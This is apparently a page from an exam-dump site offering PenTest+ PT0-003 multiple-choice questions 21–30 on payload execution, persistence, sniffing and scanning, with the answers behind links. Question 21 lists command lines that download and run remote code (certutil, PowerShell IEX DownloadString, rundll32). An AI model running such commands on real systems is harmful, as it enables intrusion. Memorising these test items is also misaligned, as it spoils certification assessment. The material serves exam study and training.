Big Halloween Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 3 out of 8 pages
Viewing questions 21-30 out of questions
Questions # 21:

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1


B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe


C.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ")


D.

rundll32.exe c:\path\foo.dll,functName


Expert Solution
Questions # 22:

A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?

Options:

A.

DAST


B.

SAST


C.

IAST


D.

SCA


Expert Solution
Questions # 23:

A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use.

Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?

Options:

A.

Utilizing port mirroring on a firewall appliance


B.

Installing packet capture software on the server


C.

Reconfiguring the application to use a proxy


D.

Requesting that certificate pinning be disabled


Expert Solution
Questions # 24:

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

Options:

A.

Bluejacking


B.

SSID spoofing


C.

Packet sniffing


D.

ARP poisoning


Expert Solution
Questions # 25:

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.

Burp Suite


B.

Wireshark


C.

Zed Attack Proxy


D.

Metasploit


Expert Solution
Questions # 26:

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Options:

A.

schtasks.exe


B.

rundll.exe


C.

cmd.exe


D.

chgusr.exe


E.

sc.exe


F.

netsh.exe


Expert Solution
Questions # 27:

The following file was obtained during reconnaissance:

Question # 27

Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?

Options:

A.

Exposure of other users' sensitive data


B.

Unauthorized access to execute binaries via sudo


C.

Hijacking the default user login shells


D.

Corrupting the skeleton configuration file


Expert Solution
Questions # 28:

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl

200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Options:

A.

Modify the scanner to slow down the scan.


B.

Change the source IP with a VPN.


C.

Modify the scanner to only use HTTP GET requests.


D.

Modify the scanner user agent.


Expert Solution
Questions # 29:

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.

Segmentation


B.

Mobile


C.

External


D.

Web


Expert Solution
Questions # 30:

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Question # 30

Question # 30

Question # 30

Question # 30

Question # 30


Expert Solution
Viewing page 3 out of 8 pages
Viewing questions 21-30 out of questions